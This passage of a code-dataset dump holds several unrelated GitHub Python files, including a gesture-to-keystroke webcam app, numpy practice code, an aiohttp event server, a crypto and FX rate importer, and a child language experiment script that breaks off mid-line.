gesture_img_dict['keystroke'][i], *keystroke_list).grid(row = i+3, column = 7, columnspan=5)\n OptionMenu(frame_setting, gesture_img_dict['keystroke'][i+5], *keystroke_list).grid(row = i+3, column = 21, columnspan=5)\n \n# Set default keystroke values\nif os.path.exists('saved_keystrokes.txt'):\n # Get saved keystrokes from txt file in current directory\n with open('.\saved_keystrokes.txt', 'r') as f:\n keystrokes = json.loads(f.readline())\n # update setting keystroke to display according to previous saved value\n gesture_img_dict['keystroke'][0].set(keystrokes[\"call_me\"]) #call_me\n gesture_img_dict['keystroke'][1].set(keystrokes[\"fist\"]) #fist\n gesture_img_dict['keystroke'][2].set(keystrokes[\"live_long\"]) #live_long\n gesture_img_dict['keystroke'][3].set(keystrokes[\"okay\"]) #okay\n gesture_img_dict['keystroke'][4].set(keystrokes[\"peace\"]) #peace\n gesture_img_dict['keystroke'][5].set(keystrokes[\"rock\"]) #rock\n gesture_img_dict['keystroke'][6].set(keystrokes[\"smile\"]) #smile\n gesture_img_dict['keystroke'][7].set(keystrokes[\"stop\"]) #stop\n 
gesture_img_dict['keystroke'][8].set(keystrokes[\"thumbs_down\"]) #thumbs_down\n gesture_img_dict['keystroke'][9].set(keystrokes[\"thumbs_up\"]) #thumbs_up\n sleep_interval.insert(0, keystrokes[\"sleep\"])\nelse:\n gesture_img_dict['keystroke'][0].set(\"volumemute\") #call_me\n gesture_img_dict['keystroke'][1].set(\"playpause\") #fist\n gesture_img_dict['keystroke'][2].set(\"pagedown\") #live_long\n gesture_img_dict['keystroke'][3].set(\"pageup\") #okay\n gesture_img_dict['keystroke'][4].set(\"right\") #peace\n gesture_img_dict['keystroke'][5].set(\"left\") #rock\n gesture_img_dict['keystroke'][6].set(\"printscreen\") #smile\n gesture_img_dict['keystroke'][7].set(\"stop\") #stop\n gesture_img_dict['keystroke'][8].set(\"volumedown\") #thumbs_down\n gesture_img_dict['keystroke'][9].set(\"volumeup\") #thumbs_up\n sleep_interval.insert(0, 3)\n\n# Save function to save all the keystroke set\ndef savefile(): \n path = os.getcwd()+'\\saved_keystrokes.txt'\n if path != '':\n with open(path, 'w') as f:\n content = f'{{\"call_me\":\"{gesture_img_dict[\"keystroke\"][0].get()}\",\"fist\":\"{gesture_img_dict[\"keystroke\"][1].get()}\",\"live_long\":\"{gesture_img_dict[\"keystroke\"][2].get()}\",\"okay\":\"{gesture_img_dict[\"keystroke\"][3].get()}\",\"peace\":\"{gesture_img_dict[\"keystroke\"][4].get()}\",\"rock\":\"{gesture_img_dict[\"keystroke\"][5].get()}\",\"smile\":\"{gesture_img_dict[\"keystroke\"][6].get()}\",\"stop\":\"{gesture_img_dict[\"keystroke\"][7].get()}\",\"thumbs_down\":\"{gesture_img_dict[\"keystroke\"][8].get()}\",\"thumbs_up\":\"{gesture_img_dict[\"keystroke\"][9].get()}\",\"sleep\":{sleep_interval.get()}}}'\n f.write(content)\n label_saved = Label(frame_setting, text = \"Keystrokes Saved\", fg='grey')\n label_saved.grid(row = 9, column=0, columnspan=26, pady = 5)\n\nbutton_save = Button(frame_setting, text = \"Save Keystroke\", padx=10, pady = 5, command = savefile, width = 10, fg='dark blue')\nbutton_save.grid(row=8, column = 8, columnspan=3)\n\n\n###################\n## Webcam Output ##\n###################\n\n# Set new frame for webcam output\nframe_webcam = LabelFrame(root, text = \"Output\", width = 780, pady=5)\nframe_webcam.grid(row=1, column=0)\n\n# We divide the frame into a 26 column grid\nfor i in range(26):\n frame_webcam.columnconfigure(i,{'minsize':30})\n # Label(frame_webcam, text = 'test').grid(row=0, column=i)\n\n# Create new label to hold webcam\nlabel_webcam = Label(frame_webcam)\nlabel_webcam.grid(row=1, column=1, columnspan=14)\n\n# # Create new text to hold prediction output\npred_text = Text(frame_webcam, width=30, height=19, wrap = WORD)\npred_text.grid(row=1, column = 16, columnspan=9)\n\n\n# initialize mediapipe\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nhands = mp_hands.Hands(max_num_hands=1, min_detection_confidence=0.7)\n\n# Load the gesture recognizer model\nmodel = load_model('hand-gesture-recognition-code/mp_hand_gesture')\n\n# Load class names\nf = open('hand-gesture-recognition-code/gesture.names', 'r')\nclassNames = f.read().split('\\n')\nf.close()\n\n\n# Initialize the webcam\ncap = cv2.VideoCapture(0)\n\n# Initialise variable to determine whether to run check_class function\nrecheck = True\n\n# Function to run if gesture detected\ndef check_class(className):\n # call upon global recheck variable\n global recheck, pred_text, keystrokes\n # Get current time\n time_now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n # Get saved keystrokes from txt file in current 
directory\n if os.path.exists('saved_keystrokes.txt'):\n with open('.\\saved_keystrokes.txt', 'r') as f:\n keystrokes = json.loads(f.readline())\n else:\n keystrokes = {\"call_me\":\"volumemute\",\"fist\":\"playpause\",\"live_long\":\"pagedown\",\"okay\":\"pageup\",\"peace\":\"right\",\"rock\":\"left\",\"smile\":\"printscreen\",\"stop\":\"stop\",\"thumbs_down\":\"volumedown\",\"thumbs_up\":\"volumeup\",\"sleep\":3}\n \n if className == 'call me' and recheck == True:\n pyautogui.press([keystrokes['call_me']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['call_me']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'fist' and recheck == True:\n pyautogui.press([keystrokes['fist']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['fist']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'live long' and recheck == True:\n pyautogui.press([keystrokes['live_long']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['live_long']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'okay' and recheck == True:\n pyautogui.press([keystrokes['okay']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['okay']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'peace' and recheck == True:\n pyautogui.press([keystrokes['peace']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['peace']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'rock' and recheck == True:\n pyautogui.press([keystrokes['rock']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['rock']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'smile' and recheck == True:\n pyautogui.press([keystrokes['smile']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['smile']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'stop' and recheck == True:\n pyautogui.press([keystrokes['stop']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['stop']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'thumbs down' and recheck == True:\n pyautogui.press([keystrokes['thumbs_down']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['thumbs_down']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'thumbs up' and recheck == True:\n pyautogui.press([keystrokes['thumbs_up']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['thumbs_up']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n \n\ndef run():\n # disable the save and run button once webcam has run\n if button_run[\"state\"] == \"normal\":\n button_run[\"state\"] = \"disabled\"\n button_save[\"state\"] = \"disabled\"\n\n def show_frames():\n # Read each frame from the webcam\n _, frame = cap.read()\n\n x, y, c = frame.shape\n\n # Flip the frame vertically\n frame = cv2.flip(frame, 1)\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n # Get hand landmark prediction\n result = hands.process(framergb)\n \n className = ''\n\n # post process the result\n if result.multi_hand_landmarks:\n landmarks = []\n for handslms in result.multi_hand_landmarks:\n for lm in handslms.landmark:\n # print(id, lm)\n lmx = int(lm.x * x)\n lmy = int(lm.y * y)\n\n landmarks.append([lmx, lmy])\n\n # Drawing landmarks on frames\n 
mp_drawing.draw_landmarks(\n frame,\n handslms,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n\n # Predict gesture\n prediction = model.predict([landmarks])\n # print(prediction)\n classID = np.argmax(prediction)\n className = classNames[classID]\n\n # show the prediction on the frame\n cv2.putText(frame, className, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA)\n\n if recheck:\n # run threading so that check_class can be run asynchronously in the background\n t = threading.Thread(target=check_class, args=(className,))\n t.start() # start child thread\n\n\n # Show the final output\n # https://stackoverflow.com/questions/62293077/why-is-pils-image-fromarray-distorting-my-image-color\n new_frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # resize to desired size\n new_frame_rgb = cv2.resize(new_frame_rgb, (400, 300))\n imgtk = ImageTk.PhotoImage(image = Image.fromarray(new_frame_rgb))\n label_webcam.imgtk = imgtk\n label_webcam.configure(image=imgtk)\n # Repeat after an interval to capture continuously\n label_webcam.after(20, show_frames)\n show_frames()\n\n\n# A run button in the setting frame to start the webcam and prediction only when clicked\nbutton_run = Button(frame_setting, text = \"Run\", padx=10, pady = 5, command = run, width = 10, fg='dark green')\nbutton_run.grid(row=8, column = 16, columnspan=3)\n\n# loop through root and check changes\nroot.mainloop()","repo_name":"erjieyong/Gesture_Control","sub_path":"Gesture_Control.py","file_name":"Gesture_Control.py","file_ext":"py","file_size_in_byte":14851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29899402090","text":"class MetricStatus:\n ACTIVE = 1\n PAUSED = 2\n\n _ALL = [ACTIVE, PAUSED]\n\n @classmethod\n def toggle_status(cls, current_status: int) -> int:\n if current_status == cls.ACTIVE:\n return cls.PAUSED\n\n return cls.ACTIVE\n\n\nclass MetricDataType:\n INT = 1\n FLOAT = 2\n STRING = 3\n INCREMENT = 4\n\n _CERBERUS_ALLOWED = set([INT, FLOAT, STRING, INCREMENT])\n\n __DB_TYPES_MAP = {\n # Postgres data types mapping\n INT: 'BIGINT',\n FLOAT: 'DOUBLE PRECISION',\n STRING: 'TEXT',\n INCREMENT: 'BIGINT'\n }\n\n __CERBERUS_TYPES_MAP = {\n # ('CERBERUS_TYPE_NAME', PYTHON_FUNC_FOR_COERCE)\n INT: ('integer', int),\n FLOAT: ('float', float),\n STRING: ('string', str),\n INCREMENT: ('integer', int)\n }\n\n _CERBERUS_TYPES = list({v[0] for v in __CERBERUS_TYPES_MAP.values()})\n\n @classmethod\n def get_db_type(cls, _type):\n return cls.__DB_TYPES_MAP.get(_type)\n\n @classmethod\n def get_cerberus_type(cls, _type):\n return cls.__CERBERUS_TYPES_MAP.get(_type)\n","repo_name":"realwhite/push_store","sub_path":"server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35439664059","text":"import http.client\n\n#? GET method request example\n\n#* 1. Create a connection object\nconn = http.client.HTTPConnection(\"www.python.org\") \n\n#* 2. Send the request\nconn.request(\"GET\", \"/index.html\")\n\n#* 3. Get the response object\nresponse = conn.getresponse()\n\n#* 4. Read the response data\ndata = response.read()\n\n#* 5. Close the connection
\nconn.close()","repo_name":"dltpals222/python-prac","sub_path":"httpClientModule.py","file_name":"httpClientModule.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41977792606","text":"import numpy as np\na = np.array([1,2,3,4,5])\nprint(type(a))\n\nb = np.array([[1,2,3,4,5], [11,12,13,14,15,]])\nprint(b)\n\nc = np.array([1,2,3,4,5,6,7,8], ndmin= 2)\nprint(c)\n\nprint(b.shape)\n\nb.shape = (5,2)\nprint(b)\n\nprint(b.ndim, b.shape)\n\na = np.arange(24)\nprint(a.ndim, a.shape)\nb = a.reshape(2,4,3)\nprint(b)\n\na = np.empty(shape=(3,4), dtype=int)\nprint(a)\n\n# convert sequences to array\nl = [1,2,3,4,5,6,7,8]\nt = (1,2,3,4,5,6,7,8)\np = {1,2,3,4,5,6,7,8}\nn = np.asarray(l)\nn1 = np.asarray(t)\nn2 = np.asarray(p)\nprint(type(n), type(n1), type(n2))\n\nl = range(50)\nfor i in l:\n print(i)\nprint(l, type(l))\n\nl = range(5)\nit = iter(l)\nprint(type(it), type(l))\nna = np.fromiter(l, dtype=int)\nna2 = np.asarray(l)\nprint(na, na2)\nna = np.arange(10, 20, 2)\nprint(na)\nn = np.array(range(10))\ns = slice(4,8,2)\nprint(n[4:8:2], n[s])\nn = np.arange(10)\nprint(n, type(n))\n\n\n# boolean of nd array\nn = np.arange(10)\nn = n[n>5]\nprint(n)\n\n# iterating arrays\nn = np.arange(0,100, 10)\nn = np.reshape(n, (5,2))\nprint(n)\nfor i in np.nditer(n):\n print(i)\nfor i in n:\n print(i)\n\nn = n.reshape(2,5)\nprint(n)\nfor i in np.nditer(n, op_flags = ['readwrite']):\n i[...] = i*2\n\nprint(n)\n\nn1 = np.arange(0, 20, 2).reshape(5,2)\nn2 = np.arange(20, 40, 2).reshape(5,2)\nprint(n1)\nprint(n2)\nfor i, j in np.nditer([n1, n2]):\n print(\"{}:{}\".format(i, j))\n r = i*j\n print(\"result: \", r)\n\nf = n1.flatten()\nprint(f)\n\n# arithmetic operations\nn = np.arange(9, dtype=float).reshape(3,3)\na = [10, 20, 30]\nr = np.multiply(n, a)\nprint(r)\n\n# mean\n\nn = np.arange(9).reshape(3,3)\nm = np.mean(n, axis=0)\nm = np.mean(n, axis=1)\nprint(n, m)\n\nn = np.array([[1, 4], [8, 6]])\nn = np.sort(n, axis=0)\nprint(n)\n\ndt = np.dtype([('name', 'S10'), ('age', int)])\na = np.array([('rava', 21), ('aziz', 89), ('islom', 99)], dtype = dt)\na = np.sort(a, order = 'name')\nprint(a)\n\na = np.array([[20, 45, 33], [66, 54, 10], [46, 32, 88]])\nam = np.argmax(a, axis=0)\nprint(am)\n\nn = np.arange(9).reshape(3,3)\nprint(n)\nm = np.where(n>3)\nprint(\"My array: \",n[m])\n\n\n# numpy matplotlib\nfrom matplotlib import pyplot as plt\nn = np.arange(1,11)\ny = 2*n+5\nprint(y)\nplt.title(\"Matplotlib demo\")\nplt.xlabel(n)\nplt.ylabel(y)\n#plt.plot()\n#plt.show()\n\n# making two plot\nx = np.arange(0, 3 * np.pi, 0.1)\ny1 = np.sin(x)\ny2 = np.cos(x)\n\nplt.subplot(2,1,1)\nplt.plot(x, y1)\nplt.title(\"Sinus\")\n\nplt.subplot(2,1,2)\nplt.plot(x, y2)\nplt.title(\"Cosine\")\n\n#plt.show()\na = np.arange(1,49).reshape(6,8)\nprint(a)\n\nnp.save('rauf_file', a)\n\n# load file from our disk\nb = np.load('rauf_file.npy')\nd = b*3\nprint(d)\n\na = np.arange(1,82).reshape(9,9)\nprint(a)\nnp.savetxt('rauf_file_txt', a)\nb = np.loadtxt('rauf_file_txt')\nprint(b*np.pi)\n\n","repo_name":"iamraufodilov/P","sub_path":"Numpy/numpy_essentials.py","file_name":"numpy_essentials.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35968878583","text":"#!/usr/bin/env python\n\n'''\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free 
Software Foundation, version 3.\n This program is distributed in the hope that it will be useful, but\n WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n General Public License for more details.\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n'''\n\nfrom aiohttp import web\nfrom aiohttp_sse import sse_response\nimport asyncio\nimport json\nimport aiohttp_jinja2\nimport jinja2\nimport os\n\ngames = {\n 'b3' : {\n 'devices' : {\n 1234 : {\n 'name' : 'Arthur'\n },\n 5678 : {\n 'name' : 'Alicia'\n }\n },\n 'devices_changed' : asyncio.Condition()\n }\n}\n\nroutes = web.RouteTableDef()\nROOT = os.path.dirname(__file__)\n\n@routes.get('/{game_name}/devices')\nasync def devices(request):\n game_name = request.match_info['game_name']\n game = games[game_name]\n devices_changed = game['devices_changed']\n async with sse_response(request) as resp:\n while True:\n devices = game['devices'] \n await resp.send(json.dumps(devices))\n async with devices_changed:\n await devices_changed.wait() \n return resp\n\n@routes.get('/')\nasync def index(request):\n content = open(os.path.join(ROOT, 'html/index.html'), 'r').read()\n return web.Response(content_type='text/html', text=content)\n\n@routes.get('/{style_name}.css')\nasync def style(request):\n style_name = request.match_info['style_name']\n content = open(os.path.join(ROOT, f'html/{style_name}.css'), 'r').read()\n return web.Response(content_type='text/css', text=content)\n\n@routes.get('/scripts/{script_name}.js')\nasync def script(request):\n script_name = request.match_info['script_name']\n content = open(os.path.join(ROOT, f'html/scripts/{script_name}.js'), 'r').read()\n return web.Response(content_type='application/javascript', text=content)\n\n@routes.get('/scripts/lib/{lib_name}.js')\nasync def lib(request):\n lib_name = request.match_info['lib_name']\n content = open(os.path.join(ROOT, f'html/scripts/lib/{lib_name}.js'), 'r').read()\n return web.Response(content_type='application/javascript', text=content)\n\napp = web.Application()\napp.add_routes(routes)\nweb.run_app(app)\n\n","repo_name":"VianneyRousset/EscapeRoom-Server","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40024457018","text":"import logging\nimport pathlib\nimport re\nimport sys\nfrom datetime import datetime\nfrom pprint import pprint\n\nimport lxml.html\nimport pymongo\nimport requests\nfrom dateutil.relativedelta import relativedelta\nfrom docopt import docopt\n\nimport coinapi\nfrom coinapi.clientbase import ClientBase\nfrom coindb.bulkop import BulkOp\n\nUTC = ClientBase.UTC\nJST = ClientBase.JST\nutc_now = ClientBase.utc_now\nparse_time = ClientBase.parse_time\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n args = docopt(\"\"\"\n Usage:\n {f} [options] EXCHANGE INSTRUMENT [PARAM...]\n \n Options:\n --db DB\n --start START [default: {start}]\n --stop STOP [default: {now}]\n\n \"\"\".format(f=pathlib.Path(sys.argv[0]).name,\n start=JST.localize(datetime(2016, 12, 29)),\n now=utc_now().astimezone(JST)))\n pprint(args)\n db_client = pymongo.MongoClient()\n db = args['--db']\n start = parse_time(args['--start'])\n stop = parse_time(args['--stop'])\n\n exchange = args['EXCHANGE']\n instrument = args['INSTRUMENT']\n if exchange == 'yahoo':\n client = 'yahoo'\n else:\n client = 
getattr(coinapi, exchange).Client() # type: ClientBase\n db = db or exchange\n db = db_client[db]\n collection = db[instrument]\n params = dict(map(lambda s: s.split('='), args['PARAM']))\n with BulkOp(collection) as bulk_op:\n collection.create_index([\n ('time', 1), ('id', 1)\n ], unique=True)\n\n if client == 'yahoo':\n gen = import_yahoo(instrument, start, stop)\n else:\n try:\n gen = client.public_executions_asc(instrument, start, stop, **params)\n except StopIteration:\n gen = client.public_executions_desc(instrument, start, stop, **params)\n\n for data in gen:\n bulk_op.insert(data)\n\n\ndef import_yahoo(instrument: str, start: datetime, stop: datetime):\n \"\"\"\n https://info.finance.yahoo.co.jp/history/?code=USDJPY%3DX&sy=2017&sm=11&sd=18&ey=2018&em=2&ed=16&tm=d&p=1\n https://info.finance.yahoo.co.jp/history/?code=USDJPY%3DX&sy=2017&sm=11&sd=18&ey=2018&em=2&ed=16&tm=d&p=3\n \"\"\"\n start = start.astimezone(JST)\n end = stop.astimezone(JST) - relativedelta(days=1)\n symbol = instrument.replace('/', '')\n assert len(symbol) == 6, instrument\n url_format = 'https://info.finance.yahoo.co.jp/history/?code={symbol}%3DX&sy={sy}&sm={sm}&sd={sd}&ey={ey}&em={em}&ed={ed}&tm=d&p={p}'\n with requests.Session() as s:\n params = dict(symbol=symbol,\n sy=start.year, sm=start.month, sd=start.day,\n ey=end.year, em=end.month, ed=end.day,\n p=1)\n while True:\n res = s.get(url_format.format(**params))\n m = re.search('\\d+~(\\d+)件/(\\d+)件中', res.text, re.MULTILINE)\n if not m:\n raise Exception('#no match')\n\n root = lxml.html.fromstring(res.text)\n td_list = []\n for tr in root.cssselect('tr'):\n for td in tr.cssselect('td'):\n td_list.append(td.text_content())\n text = ' '.join(td_list)\n text = re.sub('\\s+', ' ', text)\n for m in re.finditer(\n '(?P\\d+)年(?P\\d+)月(?P\\d+)日 (?P[.\\d]+) (?P[.\\d]+) (?P[.\\d]+) (?P[.\\d]+)',\n text, re.MULTILINE):\n \"\"\"\n yield dict(time=t,\n id='#{}'.format(i),\n price=float(data['price']),\n qty=float(data['amount']),\n data=data)\n \"\"\"\n d = m.groupdict()\n print(d)\n yield dict(time=JST.localize(datetime(int(d['y']), int(d['m']), int(d['d']))),\n id='{:04d}{:02d}{:02d}'.format(int(d['y']), int(d['m']), int(d['d'])),\n o=float(d['o']), h=float(d['h']), l=float(d['l']), c=float(d['c']))\n\n if m.group(1) == m.group(2):\n print('#end')\n return\n\n params['p'] += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tetocode/cointax","sub_path":"import_rate.py","file_name":"import_rate.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36900280254","text":"from Ex5.SystemsDecisionMaker import systems_decision_maker\nfrom Ex5.GraphGenerator import graphs_generator\n\n\"\"\"A collection of 100 graphs\"\"\"\ngraphs = graphs_generator(False)\n\"\"\"The updated 100 graps\"\"\"\nupdate_graph = {}\ni = 0\n\"\"\"A variable used to calculate the average number of pc with the system\"\"\"\nsum = 0\n\"\"\"A variable used to count the number of error. It must be 0 at the end\"\"\"\nerror = 0\nfor graph in graphs.values():\n update_graph[i] = systems_decision_maker(graph)\n \"\"\"Count the number of pc with the system\"\"\"\n j = 0\n for v in update_graph[i].vertices():\n if v.system():\n j += 1\n \"\"\"Check if there is an error. An error occurs when both the system and full_coverage are false or true\n in a vertex. 
In the first case because that vertex should have the system, \n in the second because it should not have it\"\"\"\n if (not v.full_coverage() and not v.system()) or (v.full_coverage() and v.system()):\n print(\"ERRORE\")\n error += 1\n i += 1\n sum += j\n print(\"In the \", i, \"-th graph there are \", j, \" user with the system on their pc\")\naverage = sum/100\nprint(\"The average pc with the system are \", average)\nprint(\"error \", error)","repo_name":"Army96/AADS","sub_path":"Ex5/FakeNewsDetector.py","file_name":"FakeNewsDetector.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70083582508","text":"while True:\n n = int(input())\n\n if n == 0:\n break\n\n a = list(map(int, input().split()))\n\n a.sort()\n\n res = 1000000\n\n prev = 1000000\n for item in a:\n res = min(res, abs(prev - item))\n prev = item\n\n print(res)\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/13280.py","file_name":"13280.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28633684458","text":"# This program runs only with the two folders 'sounds' and 'pictures' containing the audio and visual stimuli for the experiment\nimport os\nimport expyriment\nfrom random import randint\nimport matplotlib.pyplot as plt\n\n\"\"\" data analysis part, create histogram for the participant accuracy and its mean reaction time for each of the eight items \"\"\"\n\n#accuracy function \ndef Trueinstances(tab):\n res = 0\n for case in tab:\n if case[1] == \"True\":\n res += 1\n return res\n\n#Generate accuracy histogram\ndef AccuracyPlot(tab):\n plt.bar([0, 1], [Trueinstances(tab), len(tab) - Trueinstances(tab)], tick_label=[\"True\", \"False\"])\n plt.show()\n\n#compute the mean rt for two trials of a target word\ndef moyenne(tab, string):\n a = 0\n b = 0\n long = 1\n \n for case in tab:\n if case[0] == string and a == 0:\n a = case[2]\n elif case[0] == string and a != 0:\n b = case[2]\n long = 2\n \n return (a+b)/long\n\n# mean reaction time for each target-words + histogram\ndef RTplot(tab):\n couche = moyenne(tab, 'ELLE_OÙ_COUCHE.wav')\n main = moyenne(tab, 'ELLE_OÙ_MAIN.wav')\n voiture = moyenne(tab, 'ELLE_OÙ_VOITURE.wav')\n ballon = moyenne(tab, 'IL_OÙ_BALLON.wav')\n biberon = moyenne(tab, 'IL_OÙ_BIBERON.wav')\n livre = moyenne(tab, 'IL_OÙ_LIVRE.wav')\n nez = moyenne(tab, 'IL_OÙ_NEZ.wav')\n pied = moyenne(tab, 'IL_OÙ_PIED.wav')\n \n plt.bar([0, 1, 2, 3, 4, 5, 6, 7], [couche, main, voiture, ballon, biberon, livre, nez, pied], tick_label=[\"Couche\", \"Main\", \"Voiture\", \"Ballon\", \"Biberon\", \"Livre\", \"Nez\", \"Pied\"])\n plt.show()\n\n\n\n\"\"\" End of data analysis \"\"\"\n \n \n# Matrix (16x4) of each trial in the task. 
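# (a hypothetical, more compact construction, not in the original script: build the 16 rows\n# from the 8 unique (sound, left_pic, right_pic, target) tuples, duplicating each once, e.g.\n#   tableau = [[os.path.join('sounds', s), os.path.join('pictures', l), os.path.join('pictures', r), t]\n#              for (s, l, r, t) in base_trials for _ in range(2)]\n# where base_trials is an assumed list of those 8 tuples; the explicit literal below is kept as written.)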
It contains stimuli (sounds and pictures) and the target picture (1 or 2)\ntableau = [[os.path.join(\"sounds\", \"ELLE_OÙ_COUCHE.wav\"), os.path.join(\"pictures\",\"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_COUCHE.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_VOITURE.wav\"), os.path.join(\"pictures\",\"voiture.jpg\"), os.path.join(\"pictures\",\"balle.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_VOITURE.wav\"), os.path.join(\"pictures\",\"voiture.jpg\"), os.path.join(\"pictures\",\"balle.jpg\"), 1], \n[os.path.join(\"sounds\", \"IL_OÙ_BIBERON.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 1], \n[os.path.join(\"sounds\",\"IL_OÙ_BIBERON.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 1], \n[os.path.join(\"sounds\",\"IL_OÙ_NEZ.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 1], \n[os.path.join(\"sounds\", \"IL_OÙ_NEZ.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_MAIN.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 2], \n[os.path.join(\"sounds\", \"ELLE_OÙ_MAIN.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_BALLON.wav\"), os.path.join(\"pictures\", \"voiture.jpg\"), os.path.join(\"pictures\", \"balle.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_BALLON.wav\"), os.path.join(\"pictures\", \"voiture.jpg\"), os.path.join(\"pictures\", \"balle.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_LIVRE.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_LIVRE.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_PIED.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_PIED.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 2]]\n\nexp = expyriment.design.Experiment(name=\"looking-while-listening task\") # create an Experiment object\n#expyriment.control.set_develop_mode(on=True) ## Set develop mode. 
Comment for real experiment\n \nexpyriment.control.initialize(exp)\n \n#set mouse cursor and screen size\nmouse = expyriment.io.Mouse(show_cursor=True)\n\n \n#create a fixation cross\nfixcross = expyriment.stimuli.FixCross(size=(25, 25),\n line_width=3,\n colour=expyriment.misc.constants.C_WHITE)\n \nexp.add_data_variable_names(['sound', 'picture1', 'picture2', 'accuracy', 'rt']) #label different types of data collected\n \nexpyriment.control.start() #starts the experiment, ask for an id number\nfixcross.present() # clear screen, presenting fixation cross\n \n#Matrix for data, will append target stimuli, accuracy and rt for each trial\ntrueOrFalse = \"\"\ntabData = [[\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0]]\n\n#Experimental task\nappeared = [] #create an empty list, will append each trial completed\ni = 0\nwhile i < 16: #loop until it reaches 16 trials\n ok = False\n while ok == False:\n nbr_aleatoire = randint(0, 15) #randomize the 